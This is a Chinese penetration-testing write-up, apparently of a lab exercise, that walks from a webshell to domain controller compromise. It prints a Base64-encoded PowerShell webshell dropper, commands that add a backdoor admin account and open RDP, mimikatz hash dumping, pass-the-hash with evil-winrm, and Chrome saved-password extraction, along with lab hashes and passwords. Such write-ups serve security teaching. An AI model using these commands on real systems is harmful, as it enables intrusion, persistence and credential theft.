文章总结： 该文档记录了一次完整的内网渗透实战过程，从利用Webmin1.910弱口令获取初始权限开始，通过Stowaway搭建代理进行内网横向移动。使用fscan扫描发现FineCMSv5.1.0漏洞，通过后台getshell获取第二台主机权限，最终通过Hash传递和Chrome凭据提取等技术成功控制域控服务器。整个过程涉及RCE漏洞利用、代理搭建、内网信息收集、权限维持和横向移动等关键攻击技术。 综合评分： 85 文章分类： 内网渗透,红队,实战经验,WEB安全,漏洞分析

成功getshell！由于直接获取的shell不稳定，写入一个单独的webshell。

PowerShell写入shell.php（Base64编码命令）：

powershell

powershell -EncodedCommand WwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACIAcwBoAGUAbABsAC4AcABoAHAAIgAsACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUABEADkAdwBhAEgAQQBnAFEARwBWADIAWQBXAHcAbwBKAEYAOQBRAFQAMQBOAFUAVwB5AGQAaABKADEAMABwAEkARAA4ACsAIgApACkA

使用蚁剑连接 http://10.20.30.5:8008/shell.php，密码 a（记得配置代理）：

拿到第二个flag。

权限维持-添加用户RDP

通过蚁剑执行命令添加用户并开启RDP：

cmd

net user hack Admin123 /add net localgroup administrators hack /add reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group=”remote desktop” new enable=yes net start termservice

通过代理连接RDP：

bash

proxychains4 xfreerdp3 /v:10.20.30.5 /u:hack /p:'Admin123' /cert:ignore

PART 03

flag3

mimikatz抓取hash/爆破明文

上传mimikatz抓取Hash：

bash

privilege::debugsekurlsa::logonpasswords

得到用户 CSLAB 的NTLM Hash：2de5cd0f15d1c070851d1044e1d95c90

尝试爆破得到明文密码：qwe!@#123

ashcat爆破结果截图]

PTH-WinRM

目标主机 10.20.30.5 开放5985端口（WinRM），使用evil-winrm进行Pass-the-Hash：

bash

proxychains4 evil-winrm -i10.20.30.5 -u administrator -H 2de5cd0f15d1c070851d1044e1d95c90

登录后确认权限：

Chrome凭据提取域管明文密码

目标主机上存在Chrome浏览器，使用Chrome-App-Bound-Encryption-Decryption工具提取保存的密码。

上传 chromelevator_x64.exe 并执行：

bash

*Evil-WinRM* PS C:\Users\Administrator\Documents> C:\Users\hack\Desktop\chromelevator_x64.exe chrome

成功导出凭证到 C:\Users\Administrator\Documents\output\Chrome：

查看 passwords.json：

bash

type C:\Users\Administrator\Documents\output\Chrome\Default\passwords.json

成功读取域管明文密码：cs1ab@ijws

PTH横向移动至域控

使用得到的域管密码通过WinRM登录域控 10.20.30.66：

bash

proxychains4 evil-winrm -i10.20.30.66 -u administrator -p cs1ab@ijws

成功拿到第三个flag啦。

微信QQ交流群

欢迎大家加入[ OnePanda-Sec ] 群聊一起交流 ^ ^

| | | | — | — | | | |

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：OnePanda-Sec FuB0Y FuB0Y《内网渗透实战：从Webmin到域控的全过程》